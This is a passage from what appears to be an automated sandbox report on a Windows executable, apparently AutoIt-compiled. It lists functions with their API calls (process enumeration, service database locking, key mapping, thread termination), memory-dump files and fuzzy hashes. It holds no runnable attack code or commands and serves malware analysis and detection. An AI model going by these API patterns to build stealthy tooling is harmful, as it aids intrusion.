                            • Instruction Fuzzy Hash: 97A1C477A0062487CB20DF5AE4C46AAF7B4FB49321F1485AEDD899B314C732AC55D7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A99400, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedIncrement.KERNEL32(00B37F04), ref: 00ABC5DF
                            • InterlockedDecrement.KERNEL32(00B37F04), ref: 00ABC5FD
                            • Sleep.KERNEL32(0000000A), ref: 00ABC605
                            • InterlockedIncrement.KERNEL32(00B37F04), ref: 00ABC610
                            • InterlockedDecrement.KERNEL32(00B37F04), ref: 00ABC6C2
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Interlocked$DecrementIncrement$Sleep
                            • String ID: @COM_EVENTOBJ
                            • API String ID: 327565842-2228938565
                            • Opcode ID: d8dc9ecaa06dad4ff8c687a40488bc5efa1e9d5669bb205ee6c8c71c72a3dd2a
                            • Instruction ID: 266449ee29f5e1a4ff8bcd77403198c52b420b9dac7c08045f95f3bfa754781f
                            • Opcode Fuzzy Hash: d8dc9ecaa06dad4ff8c687a40488bc5efa1e9d5669bb205ee6c8c71c72a3dd2a
                            • Instruction Fuzzy Hash: AED18D71A002099BDF10EF94CA85FEEB7F8FF44314F208559E515AB292DB74AD46CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFB9C2, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 308COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00AFBA14
                            • VariantInit.OLEAUT32(?), ref: 00AFBAE4
                              • Part of subcall function 00AE1AB8: GetLastError.KERNEL32(?,?,00000000), ref: 00AE1B16
                              • Part of subcall function 00AE1AB8: VariantCopy.OLEAUT32(?,?), ref: 00AE1B6E
                              • Part of subcall function 00AE1AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 00AE1B84
                              • Part of subcall function 00AE1AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 00AE1B9D
                              • Part of subcall function 00AE1AB8: VariantClear.OLEAUT32(-00000058), ref: 00AE1C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Variant$Copy$ClearErrorInitLast_memset
                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                            • API String ID: 530611519-625585964
                            • Opcode ID: 769a7a18bfa8d51faeea795ddb1c35955ff016a41ad9ac62e79bfc2f40d76977
                            • Instruction ID: 85321aa1760f0d07dbc91cf03a5dcf5874b1c4bb520f00764cc22e4bed8ac5e0
                            • Opcode Fuzzy Hash: 769a7a18bfa8d51faeea795ddb1c35955ff016a41ad9ac62e79bfc2f40d76977
                            • Instruction Fuzzy Hash: 48A18172A0020DABDB10DF99DCC1EFEB7B9FB88354F508529F6049B290D7719981CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A91F20, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                            Download Yara Rule
                            APIs
                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A91F76
                            • DestroyWindow.USER32(?), ref: 00AB6EC0
                            • UnregisterHotKey.USER32(?), ref: 00AB6EE7
                            • FreeLibrary.KERNEL32(?), ref: 00AB6F8F
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AB6FC0
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                            • String ID: close all
                            • API String ID: 4174999648-3243417748
                            • Opcode ID: 1c0d93a229e8221c3fd7aa13a30ef0a01f91a4b460124204923d4ec08086f3a3
                            • Instruction ID: a1b6b99292b3bb827db9c15142ff66d69918f52784830ccab480438da1b101b5
                            • Opcode Fuzzy Hash: 1c0d93a229e8221c3fd7aa13a30ef0a01f91a4b460124204923d4ec08086f3a3
                            • Instruction Fuzzy Hash: 06A15D75710202DFCB14EF64CA86B9AF3F8BF48300F5046A9E509AB252DB74AD56CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADC753, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                            • API String ID: 1038674560-2734436370
                            • Opcode ID: 8b0d4edc261ba7eabb12c6b653dc109fb13adc3801824f1a4c8e2e2f0f6c1b89
                            • Instruction ID: d08d7592bea7f7d146116bc24f5331a31313955933112f26eeb5357f3a1ef21a
                            • Opcode Fuzzy Hash: 8b0d4edc261ba7eabb12c6b653dc109fb13adc3801824f1a4c8e2e2f0f6c1b89
                            • Instruction Fuzzy Hash: B8210D3365061067D720A618AD83FDF73989F66320F448067F8059F342D766A98583E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC3D83, Relevance: 12.1, APIs: 8, Instructions: 107COMMON
                            Download Yara Rule
                            APIs
                            • EnumProcesses.PSAPI(?,00000800,?,?,00AD3C4D,?,?,?,00B38178), ref: 00AC3DA0
                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00B38178), ref: 00AC3DFE
                            • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00AC3E11
                            • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00AC3E28
                            • __wsplitpath.LIBCMT ref: 00AC3E52
                            • _wcscat.LIBCMT ref: 00AC3E65
                            • __wcsicoll.LIBCMT ref: 00AC3E75
                            • CloseHandle.KERNEL32(00000000), ref: 00AC3EAD
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                            • String ID:
                            • API String ID: 2903788889-0
                            • Opcode ID: 27e51be6e5f572b0ff07c41d912afbff1066235da5c6d1ba8d2769513e4d2d5b
                            • Instruction ID: d7c354f823b9227f58f7bd660f0dfde05e96b91cc545d1d11ef59b4a310d8c62
                            • Opcode Fuzzy Hash: 27e51be6e5f572b0ff07c41d912afbff1066235da5c6d1ba8d2769513e4d2d5b
                            • Instruction Fuzzy Hash: F9316576900108ABDF15DF94DD84FEE77BDAF99700F108199FA0597240DB71AF858BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B09705, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Variant$Copy$ClearErrorLast
                            • String ID: NULL Pointer assignment$Not an Object type
                            • API String ID: 2487901850-572801152
                            • Opcode ID: 304f7d9d412a5d8ac816603cc586cc4bf0d060553c25ab865bcb96045209f960
                            • Instruction ID: f72b940c22bf9fe9744243158e1cc1f4890a313c6939d61fc714e096e286e712
                            • Opcode Fuzzy Hash: 304f7d9d412a5d8ac816603cc586cc4bf0d060553c25ab865bcb96045209f960
                            • Instruction Fuzzy Hash: 62C18275A00209AFDF14DF94C8C1FEEBBB9EB48340F508599F905A7282D7759D84CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F540, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • _strlen.LIBCMT ref: 00A9F548
                              • Part of subcall function 00A9F700: _memset.LIBCMT ref: 00A9F708
                              • Part of subcall function 00A9F570: _memmove.LIBCMT ref: 00A9F5B9
                              • Part of subcall function 00A9F570: _memmove.LIBCMT ref: 00A9F5D3
                            • _memset.LIBCMT ref: 00A9F663
                            • _memset.LIBCMT ref: 00A9F66D
                            • _memset.LIBCMT ref: 00A9F67A
                            • _sprintf.LIBCMT ref: 00A9F69E
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memset$_memmove$_sprintf_strlen
                            • String ID: %02X
                            • API String ID: 1823384282-436463671
                            • Opcode ID: b30d205119d5ff47d4938456affe98526476c5e0e3270ee39874d967d73d6e57
                            • Instruction ID: 7c751e820d2e8dd105a1f3d3dbc036ea56d6ff35a8cf457370d7e0ca83e10619
                            • Opcode Fuzzy Hash: b30d205119d5ff47d4938456affe98526476c5e0e3270ee39874d967d73d6e57
                            • Instruction Fuzzy Hash: 4221DA727002147BDF10A66DCD82B9AB7DCAF45700F10407AF605D7192EA64AE5583A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD4AE1, Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcscpy$_wcscat
                            • String ID:
                            • API String ID: 2037614760-0
                            • Opcode ID: c75dba6e614116b94f097de9b348c993c97bec51e850f236bb972012156e9411
                            • Instruction ID: dbed76dba5353c514fa7c73711d957611b554e8eda32c250d3db300f2b0da0e0
                            • Opcode Fuzzy Hash: c75dba6e614116b94f097de9b348c993c97bec51e850f236bb972012156e9411
                            • Instruction Fuzzy Hash: 2741E2715001146BCB24EFA89AD1AFF7768EFAE321F40405FF88787312D7319992D6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE1AB8, Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,?,00000000), ref: 00AE1B16
                            • VariantCopy.OLEAUT32(?,?), ref: 00AE1B6E
                            • VariantCopy.OLEAUT32(-00000068,?), ref: 00AE1B84
                            • VariantCopy.OLEAUT32(-00000088,?), ref: 00AE1B9D
                            • VariantClear.OLEAUT32(-00000058), ref: 00AE1C17
                            • SysAllocString.OLEAUT32(00000000), ref: 00AE1C30
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Variant$Copy$AllocClearErrorLastString
                            • String ID:
                            • API String ID: 960795272-0
                            • Opcode ID: 01071c299ec75f5894d76859ee21d3613faac94fbef0d92da3f619b7a9e861fe
                            • Instruction ID: e57e65776b93c3c42a7a39c0ff4e0186e4726f388916e469c419f71c864a2225
                            • Opcode Fuzzy Hash: 01071c299ec75f5894d76859ee21d3613faac94fbef0d92da3f619b7a9e861fe
                            • Instruction Fuzzy Hash: 7F51B0B5A142499FCB14DF64DC81B9EB7F5FF48300F208569E904AB361DB74AE45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC3187, Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00B38178), ref: 00AC319E
                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00B38178), ref: 00AC31B9
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B38178), ref: 00AC31C3
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00B38178), ref: 00AC31CB
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B38178), ref: 00AC31D5
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: d3a6e90008fd45af93db52eead88a37c0f0e9da3e42b10872a1a8541b73d17f6
                            • Instruction ID: f1fa1b712b18d7eaf6f040162653638a6b3c72d0e27219aa4fd6518fa124d11e
                            • Opcode Fuzzy Hash: d3a6e90008fd45af93db52eead88a37c0f0e9da3e42b10872a1a8541b73d17f6
                            • Instruction Fuzzy Hash: E2119336D0411DABCF00DF99E904AEDB778FF49722F02C655EA05B3204DB319A618BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA6FA5, Relevance: 9.0, APIs: 6, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 00AA6FB1
                              • Part of subcall function 00AA798C: __getptd_noexit.LIBCMT ref: 00AA798F
                              • Part of subcall function 00AA798C: __amsg_exit.LIBCMT ref: 00AA799C
                            • __amsg_exit.LIBCMT ref: 00AA6FD1
                            • __lock.LIBCMT ref: 00AA6FE1
                            • InterlockedDecrement.KERNEL32(?), ref: 00AA6FFE
                            • _free.LIBCMT ref: 00AA7011
                            • InterlockedIncrement.KERNEL32(032017D8), ref: 00AA7029
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                            • String ID:
                            • API String ID: 3470314060-0
                            • Opcode ID: 10ba3bdf005c7ad95be6d3caaa6992bdbbc5f082df33684ec06403f909b68d36
                            • Instruction ID: 2d1d967e2e5663498f97da2ba1040d086a83d20be512d6f9877b81f555850348
                            • Opcode Fuzzy Hash: 10ba3bdf005c7ad95be6d3caaa6992bdbbc5f082df33684ec06403f909b68d36
                            • Instruction Fuzzy Hash: 90019232945621EBD761BB64A905B6E77A0BF06B20F080106F940A72D2CB347D82DFD5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F010, Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A9F048
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A9F050
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A9F05B
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A9F066
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A9F06E
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9F076
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            • Opcode ID: e24ea07ff36025787c398f30430bdaf952575ca26ed735da73ee5ac4c2ec81d6
                            • Instruction ID: 3cce24e15f5c91c21b3a6230ccbaa2929f91f85031f95ed1db9e39776e710a0d
                            • Opcode Fuzzy Hash: e24ea07ff36025787c398f30430bdaf952575ca26ed735da73ee5ac4c2ec81d6
                            • Instruction Fuzzy Hash: 80016770106B88ADD3309F668C84B43FEF8EF95704F01490DD1D507A92C6B5A84CCB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADB5C7, Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,?), ref: 00ADB5E1
                            • EnterCriticalSection.KERNEL32(?), ref: 00ADB5F2
                            • TerminateThread.KERNEL32(?,000001F6), ref: 00ADB600
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 00ADB60E
                              • Part of subcall function 00AC25E5: CloseHandle.KERNEL32(00000000,00000000,?,00ADB61A,00000000,?,000003E8,?,000001F6), ref: 00AC25F3
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ADB623
                            • LeaveCriticalSection.KERNEL32(?), ref: 00ADB62A
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            • Opcode ID: 4d63bb6d43283cdcf9637b34745968db7c37a1e222e02d13b9f35588a812e51b
                            • Instruction ID: 4f3f12cc888ad90430c49d6f75dba255051078b63e56d23ce6067bb2aac5aa01
                            • Opcode Fuzzy Hash: 4d63bb6d43283cdcf9637b34745968db7c37a1e222e02d13b9f35588a812e51b
                            • Instruction Fuzzy Hash: 9DF08C72141201BBD200AB60EC88DEFB77CFB48311B804126F60283690CB74E521CBF1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC2FD3, Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,00B390E8,14000000,00ABE1BD), ref: 00AC2FDD
                            • LockServiceDatabase.ADVAPI32(00000000), ref: 00AC2FEA
                            • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00AC2FF5
                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00AC2FFE
                            • GetLastError.KERNEL32 ref: 00AC3009
                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00AC3019
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                            • String ID:
                            • API String ID: 1690418490-0
                            • Opcode ID: 119e50dc38ebd24116c994943b0f03cdb33b01c8a7a8ebff6c894bece2fd2ea3
                            • Instruction ID: d7e0c8db3e25bd3c9d08f3a1cf1c49b9ae71ca07492412ddc638a5bd429dd762
                            • Opcode Fuzzy Hash: 119e50dc38ebd24116c994943b0f03cdb33b01c8a7a8ebff6c894bece2fd2ea3
                            • Instruction Fuzzy Hash: 7DE09233A836206FDA221B24AC0DFCB3B5DEB1E712F458203F201D3150CF598915DBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEF9B8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00AEFA20
                            • GetMenuItemInfoW.USER32 ref: 00AEFA3B
                            • DeleteMenu.USER32(?,?,00000000), ref: 00AEFA8C
                            • DeleteMenu.USER32(00000000,?,00000000), ref: 00AEFADF
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Menu$Delete$InfoItem_memset
                            • String ID: 0
                            • API String ID: 1173514356-4108050209
                            • Opcode ID: 6ef36a294c26ef7101797b5e261d9693e265f9ed8d0e50f534b61e324fc31d3b
                            • Instruction ID: 9acb722671732c555241ab27e6db551c6a9a88a34c7d15f2b6834cc7231f039c
                            • Opcode Fuzzy Hash: 6ef36a294c26ef7101797b5e261d9693e265f9ed8d0e50f534b61e324fc31d3b
                            • Instruction Fuzzy Hash: E541BEB1204241AFD710DF25D884B5AB7E8EF99324F14867EF9A89B2C1D770E9418BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AAF619, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00AAF627
                              • Part of subcall function 00AA34DB: __FF_MSGBANNER.LIBCMT ref: 00AA34F4
                              • Part of subcall function 00AA34DB: __NMSG_WRITE.LIBCMT ref: 00AA34FB
                              • Part of subcall function 00AA34DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00AA6A35,?,00000001,?,?,00AA8179,00000018,00B1D180,0000000C,00AA8209), ref: 00AA3520
                            • _free.LIBCMT ref: 00AAF63A
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
